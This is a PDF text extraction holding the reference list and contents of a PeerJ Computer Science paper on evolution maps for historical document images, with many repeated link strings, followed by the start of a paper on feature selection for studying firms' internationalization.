http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=6628633 http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://www.cs.bgu.ac.il/~billero/GenizahDocumentsAnnotationData.zip http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dx.doi.org/10.7717/peerj-cs.39#supplemental-information http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dl.acm.org/citation.cfm?id=2037362 http://dx.doi.org/10.7717/peerj-cs.39 Badekas E, Papamarkos N. 2007. Optimal combination of document binarization techniques using a self-organizing map neural network. Engineering Applications of Artificial Intelligence 20(1):11–24 DOI 10.1016/j.engappai.2006.04.003. Bar-Yosef I, Beckman I, Kedem K, Dinstein I. 2007. Binarization, character extraction, and writer identification of historical hebrew calligraphy documents. International Journal on Document Analysis and Recognition 9(2):89–99 DOI 10.1007/s10032-007-0041-5. Biller O, Asi A, Kedem K, El-Sana J. 2013. WebGT: an interactive web-based system for historical document ground truth generation. Technical Report 13–03. Be’er Sheva: Computer Science Department, Ben-Gurion University of the Negev, Israel. Bukhari SS, Azawi MIAA, Shafait F, Breuel TM. 2010. Document image segmentation using discriminative learning over connected components. In: Doermann DS, Govindaraju V, Lopresti DP, Natarajan P, eds. The Ninth IAPR international workshop on document analysis systems, DAS 2010. New York: ACM, 183–190. De Carvalho MAG, Da Costa AL, Ferreira ACB, Marcondes César Júnior R. 2010. Image segmentation using component tree and normalized cut. In: SIBGRAPI. Piscataway: IEEE Computer Society, 317–322. Fischer A, Frinken V, Fornes A, Bunke H. 2011. Transcription alignment of latin manuscripts using hidden markov models. In: 1st international workshop on historical document imaging and processing (HIP). New York: ACM, 29–36. Fischer A, Keller A, Frinken V, Bunke H. 2012. Lexicon-free handwritten word spotting using character hmms. Pattern Recognition Letters 33:934–942 DOI 10.1016/j.patrec.2011.09.009. Gatos B, Stamatopoulos N, Louloudis G. 2011. ICDAR2009 handwriting segmentation contest. International Journal on Document Analysis and Recognition 14(1):25–33 DOI 10.1007/s10032-010-0122-8. Garz A, Fischer A, Sablatnig R, Bunke H. 2012. Binarization-free text line segmentation for historical documents based on interest point clustering. In: Document Analysis Systems (DAS), 2012 10th IAPR international workshop. Piscataway: IEEE, 95–99. Jain AK, Zhong Y. 1996. Page segmentation using texture analysis. Pattern Recognition 29(5):743–770 DOI 10.1016/0031-3203(95)00131-X. Liu Y, Srihari SN. 1997. Document image binarization based on texture features. IEEE Transac- tions on Pattern Analysis and Machine Intelligence 19(5):540–544 DOI 10.1109/34.589217. Mosorov V, Kowalski TM. 2002. The development of component tree for grayscale image segmentation. In: Proceedings of the international conference on moderns problems of radio engineering, telecommunications and computer science TCSET. Piscataway: IEEE, 252–253. Naegel B, Wendling L. 2010. A document binarization method based on connected operators. Pattern Recognition Letters 31(11):1251–1259 DOI 10.1016/j.patrec.2010.04.003. New B, Ferrand L, Pallier C, Brysbaert M. 2006. Reexamining the word length effect in visual word recognition: new evidence from the English lexicon project. Psychonomic Bulletin and Review 13(1):45–5 DOI 10.3758/BF03193811. Ntirogiannis K, Gatos B, Pratikakis I. 2009. A modified adaptive logical level binarization technique for historical document images. In: 10th international conference on document analysis and recognition. Piscataway: IEEE, 1171–1175. Pajdla T, Urban M, Chum O, Matas J. 2002. Robust wide baseline stereo from maximally stable extremal regions. In: Proceedings of the British machine vision conference. p. 3D and Video. Available at http://cmp.felk.cvut.cz/∼matas/papers/matas-bmvc02.pdf. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 19/20 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/j.engappai.2006.04.003 http://dx.doi.org/10.1007/s10032-007-0041-5 http://dx.doi.org/10.1016/j.patrec.2011.09.009 http://dx.doi.org/10.1007/s10032-010-0122-8 http://dx.doi.org/10.1016/0031-3203(95)00131-X http://dx.doi.org/10.1109/34.589217 http://dx.doi.org/10.1016/j.patrec.2010.04.003 http://dx.doi.org/10.3758/BF03193811 http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc02.pdf http://dx.doi.org/10.7717/peerj-cs.39 Pikaz A, Averbuch A. 1996. Digital image thresholding, based on topological stable-state. Pattern Recognition 29(5):829–843 DOI 10.1016/0031-3203(95)00126-3. Pratikakis I, Gatos B, Ntirogiannis K. 2010. H-DIBCO 2010—handwritten document image binarization competition. In: ICFHR. Piscataway: IEEE Computer Society, 727–732. Rabaev I, Biller O, El-Sana J, Kedem K, Dinstein I. 2013. Text line detection in corrupted and damaged historical manuscripts. In: 12th international conference on document analysis and recognition (ICDAR’13). Piscataway: IEEE. Raju SS, Pati PB, Ramakrishnan AG. 2004a. Gabor filter based block energy analysis for text extraction from digital document images. In: Proceedings of the first international workshop on document image analysis for libraries (DIAL’04). Piscataway: IEEE Computer Society, 233. Available at http://dl.acm.org/citation.cfm?id=968882.969393. Raju SS, Pati PB, Ramakrishnan AG. 2004b. Gabor filter based block energy analysis for text extraction from digital document images. In: Document image analysis for libraries. Piscataway: IEEE, 233–243. Rivest-Hénault D, Moghaddam RF, Cheriet M. 2012. A local linear level set method for the binarization of degraded historical document images. International Journal on Document Analysis and Recognition 15(2):101–124 DOI 10.1007/s10032-011-0157-5. Roy P, Pal U, Llados J, Delalandre M. 2009. Multi-oriented and multi-sized touching character segmentation using dynamic programming. In: Proceedings of the 2009 10th international conference on document analysis and recognition, ICDAR ’09. Piscataway: IEEE Computer Society, 11–15. Su B, Lu S, Tan CL. 2013. Robust document image binarization technique for degraded document images. IEEE Transactions on Image Processing 22(4):1408–1417 DOI 10.1109/TIP.2012.2231089. Wen D, Ding X. 2004. A general framework for multicharacter segmentation and its application in recognizing multilingual Asian documents. In: Smith EHB, Hu J, Allan J, eds. Proceedings of the SPIE conference on document recognition and retrieval XI, vol. 5296, Bellingham: SPIE, 147–154. Available at https://www.msu.edu/∼wendi/publication/DRRXI Manuscript.pdf. Zagoris K, Papamarko N. 2010. Text extraction using document structure features and support vector machines. In: Proceedings of the 11th IASTED international conference computer graphics and imaging (CGIM 2010). Calgary: IASTED, 88–91. Biller et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.39 20/20 https://peerj.com/computer-science/ http://dx.doi.org/10.1016/0031-3203(95)00126-3 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dl.acm.org/citation.cfm?id=968882.969393 http://dx.doi.org/10.1007/s10032-011-0157-5 http://dx.doi.org/10.1109/TIP.2012.2231089 https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf https://www.msu.edu/~wendi/publication/DRRXI_Manuscript.pdf http://dx.doi.org/10.7717/peerj-cs.39 Evolution maps and applications Introduction Related Work Evolution Maps Definition of the evolution map Construction of the evolution map Analysis of the CEM Applications Estimation of character dimensions Improving binarization methods Line segmentation of degraded documents Stroke width estimation Analysis of feature distribution in documents Summary Acknowledgements References work_ydnazyhnonfvhfabfx2jkhm3pi ---- peerj-cs-403 1..26 Advanced feature selection to study the internationalization strategy of enterprises Álvaro Herrero1, Alfredo Jiménez2 and Roberto Alcalde3 1 Departamento de Ingeniería Informática, Universidad de Burgos, Burgos, Spain 2 Department of Management, KEDGE Business School, Bordeaux, France 3 Departamento de Economia y Administración de Empresas, Universidad de Burgos, Burgos, Spain ABSTRACT Firms face an increasingly complex economic and financial environment in which the access to international networks and markets is crucial. To be successful, companies need to understand the role of internationalization determinants such as bilateral psychic distance, experience, etc. Cutting-edge feature selection methods are applied in the present paper and compared to previous results to gain deep knowledge about strategies for Foreign Direct Investment. More precisely, evolutionary feature selection, addressed from the wrapper approach, is applied with two different classifiers as the fitness function: Bagged Trees and Extreme Learning Machines. The proposed intelligent system is validated when applied to real-life data from Spanish Multinational Enterprises (MNEs). These data were extracted from databases belonging to the Spanish Ministry of Industry, Tourism, and Trade. As a result, interesting conclusions are derived about the key features driving to the internationalization of the companies under study. This is the first time that such outcomes are obtained by an intelligent system on internationalization data. Subjects Data Mining and Machine Learning, Data Science Keywords Evolutionary feature selection, Bagged decision trees, Extreme learning machines, Internationaliza-tion, Multinational enterprises INTRODUCTION Many companies nowadays invest and conduct activities in multiple foreign markets. However, a successful internationalization strategy is far from easy in a global environment currently characterized by increasing complexity of networks and interconnections and growing competition (Johanson & Vahlne, 2009; Vahlne, 2013; Vahlne & Bhatti, 2019). For these reasons, international strategy requires accurate and insightful information on the main determinants driving foreign investments to be able to implement the most appropriate decisions. Specifically, one of the first and foremost relevant decisions is the selection of the target market. A carefully crafted international investment operation can go completely wrong if the location is not correct. Accordingly, international business scholars have paid great attention to the study of the determinants of internationalization, notably of Foreign Direct Investment (FDI) operations. Among the myriad of factors playing a relevant role in the firm’s choice of an oversea market, previous studies have highlighted that in addition to firm features such as the industry to which the company belongs, the profitability or the size, and the specific characteristics of the country in terms of macroeconomic figures such as the Gross How to cite this article Herrero Á, Jiménez A, Alcalde R. 2021. Advanced feature selection to study the internationalization strategy of 